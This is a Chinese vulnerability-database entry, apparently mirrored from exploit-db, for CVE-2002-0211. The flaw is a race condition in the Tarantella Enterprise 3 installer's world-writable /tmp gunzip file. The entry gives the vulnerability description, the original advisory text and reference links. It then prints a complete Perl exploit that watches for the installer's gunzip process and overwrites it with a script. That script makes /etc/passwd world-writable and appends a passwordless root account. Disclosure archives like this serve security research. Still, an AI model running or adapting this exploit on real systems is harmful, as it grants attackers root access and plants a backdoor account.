Tarantella Enterprise 3 gunzip竞争条件漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1106610 漏洞类型 竞争条件
发布时间 2002-02-08 更新时间 2005-10-12
CVE编号 CVE-2002-0211 CNNVD-ID CNNVD-200205-031
漏洞平台 Unix CVSS评分 6.2
|漏洞来源
https://www.exploit-db.com/exploits/21244
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200205-031
|漏洞详情
TarantellaEnterprise3是一个基于Web的集中化的IT应用环境控制软件。TarantellaEnterprise在安装过程中存在竞争条件问题,可以使本地攻击者得到主机的root权限。在安装过程中,程序会在$TMPDIR环境变量指定的临时文件目录(通常是/tmp)中创建一个二进制的gunzip文件,此文件的文件名一般是gunzip$$,$$代表了进程号,安装程序会以root身份在以后的安装过程中用到这个gunzip程序。这个gunzip程序在被创建时是全局可读写的,如果能在它被使用之前以其他的可执行程序替换之,则可能以root身份执行任意命令。此漏洞只有软件安装时才可能被利用。
|漏洞EXP
source: http://www.securityfocus.com/bid/3966/info

Tarantella Enterprise 3 is vulnerable to a race condition during the installation process. During installation, a root owned binary is created in /tmp (the directory specified by the $TMPDIR environment variable) with the name gunzip#### where #### is a PID. Prior to it being invoked by the installation program it can be overwritten by a local user. This is then run by the installation program with root privileges.

An attacker can only gain privileges in this manner if a privileged user is installing the software.

#!/usr/bin/perl -w
#Another Exploit for tarantella enterprise 3 installation.
#Larry Cashdollar lwc@vapid.dhs.org 2/08/2002
#Exploits gunzip$$ binary being created in /tmp with perm 777
#http://online.securityfocus.com/bid/3966
#Experimental ext3 kernel mods for preventing/researching race conditions.
#http://vapid.dhs.org/tmp-patch-kernel-2.4.17.html

use strict;

`cat  <<  -EOF- > root.sh
#!/bin/sh
chmod 777 /etc/passwd
echo "tarexp::0:0:Tarantella Exploit:/:/bin/bash" >> /etc/passwd
-EOF-`;

my $OUT = '';

while(!$OUT) {
	$OUT =  `ps -ax |grep gunzip |grep -v grep`;
        print "Found $OUT\n";
}

my @args  = split(' ',$OUT);
# Do this with one copy operation. This will break installation of tarantella.
# should test for -w on /etc/passwd stop and su - tarexp.
while(1) {
`cp root.sh $args[4]`;
}
|参考资料

来源:www.tarantella.com
链接:http://www.tarantella.com/security/bulletin-04.html
来源:XF
名称:tarantella-gunzip-tmp-race(7996)
链接:http://www.iss.net/security_center/static/7996.php
来源:BUGTRAQ
名称:20020404ExploitforTarantellaEnterprise3installation(BID3966)
链接:http://online.securityfocus.com/archive/1/265845
来源:BUGTRAQ
名称:20020126VulnerabilityreportforTarantellaEnterprise3.
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=101208650722179&w=2
来源:BID
名称:3966
链接:http://www.securityfocus.com/bid/3966